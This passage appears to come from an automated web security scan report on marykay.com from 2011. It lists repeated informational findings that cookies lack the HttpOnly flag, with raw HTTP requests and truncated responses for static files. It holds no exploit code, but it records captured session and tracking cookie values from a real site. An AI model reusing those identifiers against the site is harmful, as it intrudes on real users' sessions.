HTTP/1.1 200 OK Content-Length: 27154 Content-Type: application/x-shockwave-flash Last-Modified: Thu, 01 Sep 2011 11:38:38 GMT Accept-Ranges: bytes ETag: "823f5b19b68cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:54 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/ CWS.0...x....\........!-%. .(..R..(..JH,%...J.X. 6v+*"`..6v`..".` ..S..,..z..w....s..s..93'.L>.F..:..R..".*..?Kb__.9.........b.LI.a.l#}.....%2.7.... ..a..L...3../.....}.. ...gD...F|..R..T.3....}....e....[SNIP]...
13.229. http://www.marykay.com/IMAGES/bkgLong.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/IMAGES/bkgLong.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IMAGES/bkgLong.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1942 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:18:22 GMT Accept-Ranges: bytes ETag: "4fd9e5621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ GIF89a.......B<:>87JDC60/HBAD><2,+F@>:43@:9<65XRP8214.-4.,;54710?982,*822C=<WQPGA?@::1+*SMLKEC=66OIHXQO3-,932810XQPYRQ5/.D?>LEDF?>E@><55A;:PIG@98VPNWQOUOMSMKMGEOIGTNLRLJQKIPJHNHFICALFDNGFTNMSLKVPOPJIV...[SNIP]...
13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Checkout/viewbag/btn_x.png
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Checkout/viewbag/btn_x.png HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 695 Content-Type: image/png Last-Modified: Thu, 02 Jun 2011 09:23:29 GMT Accept-Ranges: bytes ETag: "77524cbc621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...YIDATx...Kk.Q.....<.......2A.J....Tpa.FS....r......"....,.nJ.L........L.....g:. x.r/w...s.....0.[..;....>l..{.$!.T*.l6.\.........[SNIP]...
13.231. http://www.marykay.com/Images/Site/FooterBack1.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/FooterBack1.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Site/FooterBack1.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1466 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "ebcd3647621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ GIF89a..'..................................................................................................................................................................................................[SNIP]...
13.232. http://www.marykay.com/Images/Site/hdottedline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/hdottedline.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Site/hdottedline.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 809 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "b3923b47621cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:51 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ GIF89a.....................................................................................................................................................................................................[SNIP]...
13.233. http://www.marykay.com/Images/Site/searchbox.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/searchbox.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Site/searchbox.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 952 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "17f53d47621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ GIF89a.......xKKlCB|OLqFEb=<Z87f?>sHEwKIoFD|MKzKK\:7|ON^;;oFEfA>^;9wJI\87lEBhC@jCB|OKb?<wKKuJG.ONzMKb=;`;;~ONsFEsHG`=;|MLZ:7|KKsJGd?>mFDmEB\;9.POb;;d?<jC@qHE\:9.PNhC>wJGxMK\;7hA@~OLoFB^:9xKIoEBmCBf?<m...[SNIP]...
13.234. http://www.marykay.com/Images/Site/vdottedline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/vdottedline.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Site/vdottedline.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 809 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "a77e4747621cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:51 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ GIF89a.....................................................................................................................................................................................................[SNIP]...
13.235. http://www.marykay.com/Images/Site/wholeheader.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/wholeheader.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Images/Site/wholeheader.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 13033 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "be14947621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................u.......[SNIP]...
13.236. http://www.marykay.com/JS/swfobject.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/JS/swfobject.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /JS/swfobject.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 6902 Content-Type: application/x-javascript Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "070ef5621cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /** * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License: * http://www.open...[SNIP]...
13.237. http://www.marykay.com/Menu.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Menu.css
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Menu.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 4421 Content-Type: text/css Last-Modified: Thu, 02 Jun 2011 09:18:09 GMT Accept-Ranges: bytes ETag: "809efefc521cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ .commentfix{} /* These styles contain RARELY CHANGED rules used when the Menu control adapter is enabled. */ /* These rules correspond to the "pure CSS menu" technique that have been evolving over t...[SNIP]...
13.238. http://www.marykay.com/Scripts/HeaderScript.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Scripts/HeaderScript.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Scripts/HeaderScript.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1283 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ ...var headID = document.getElementsByTagName("head")[0]; if (typeof jQuery == 'undefined') { //alert("Jquery not present"); var newScriptJQuery = document.createElement('script'); new...[SNIP]...
13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Scripts/jquery-1.4.2.min.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Scripts/jquery-1.4.2.min.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 38069 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ /*! * jQuery JavaScript Library v1.3 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2...[SNIP]...
13.240. http://www.marykay.com/Styles.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Styles.css
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Styles.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 14259 Content-Type: text/css Last-Modified: Wed, 10 Aug 2011 07:14:08 GMT Accept-Ranges: bytes ETag: "0e050182d57cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /*******************************************************************************************************************\ * Global Styles ...[SNIP]...
13.241. http://www.marykay.com/Styles_US.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Styles_US.css
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Styles_US.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 23822 Content-Type: text/css Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT Accept-Ranges: bytes ETag: "03597fd521cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /*******************************************************************************************************************\ * Global Styles ...[SNIP]...
13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Themes/TabMenu/US/tabs.css
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Themes/TabMenu/US/tabs.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 0 Content-Type: text/css Last-Modified: Wed, 06 Apr 2011 17:12:30 GMT Accept-Ranges: bytes ETag: "7970d2cf7df4cb1:d8226" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
13.243. http://www.marykay.com/Themes/TabMenu/tabs.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Themes/TabMenu/tabs.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
